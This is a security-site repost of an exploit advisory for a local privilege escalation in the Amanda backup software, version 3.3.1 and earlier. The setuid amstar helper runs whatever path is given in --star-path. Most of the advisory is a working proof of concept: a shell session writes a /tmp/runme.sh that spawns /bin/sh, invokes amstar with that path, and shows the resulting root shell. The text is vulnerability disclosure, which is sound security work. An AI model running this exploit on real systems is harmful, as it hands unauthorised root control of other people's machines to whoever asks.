首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Amanda <= 3.3.1 - amstar Command Injection Local Root
来源:vfocus.net 作者:Fantastic 发布时间:2016-01-19  
AMANDA, the Advanced Maryland Automatic Network Disk Archiver, is a backup
solution that allows the IT administrator to set up a single master backup
server to back up multiple hosts over network to tape drives/changers or
disks or optical media. Amanda uses native utilities and formats (e.g. dump
and/or GNU tar) and can back up a large number of servers and workstations
running multiple versions of Linux or Unix.
 
A user with backup privs can trivially compromise a client installation.
Amstar is an Amanda Application API script. It should not be run by users
directly. It uses star to backup and restore data. It runs binaries with
root permissions when parsing the command line arguement --star-path.
 
Tested against Amanda 3.3.1. An example is shown below:
 
$ id
uid=34(backup) gid=34(backup) groups=34(backup),6(disk),26(tape)
$ cat /tmp/runme.sh
#!/bin/sh
/bin/sh
$ ls -al /usr/lib/amanda/application/amstar
-rwsr-xr-- 1 root backup 31284 Jul 29  2012 /usr/lib/amanda/application/amstar
$ /usr/lib/amanda/application/amstar restore --star-path=/tmp/runme.sh
# id
uid=0(root) gid=34(backup) groups=0(root),6(disk),26(tape),34(backup)
# uname -a
Linux raspberrypi 3.10.25 #1 Sat Dec 28 20:50:23 EST 2013 armv6l GNU/Linux
#
 
 -- Hacker Fantastic
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·SevOne NMS <= 5.3.6.0 - Remote
·NetSchedScan 1.0 - Crash PoC
·WhatsUp Gold 16.3 - Unauthenti
·Linux Kernel REFCOUNT Overflow
·Konica Minolta FTP Utility 1.0
·Art Systems FluidDraw P5/S5 5.
·SNScan 1.05 - Scan Hostname/IP
·BlueControl 3.5 SR5 Insecure L
·Internet Explorer 11.0.9600.18
·Java Platform SE 6 U24 HtmlCon
·FortiGate OS Version 4.x - 5.0
·xWPE 1.5.30a-2.1 - Local Buffe
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved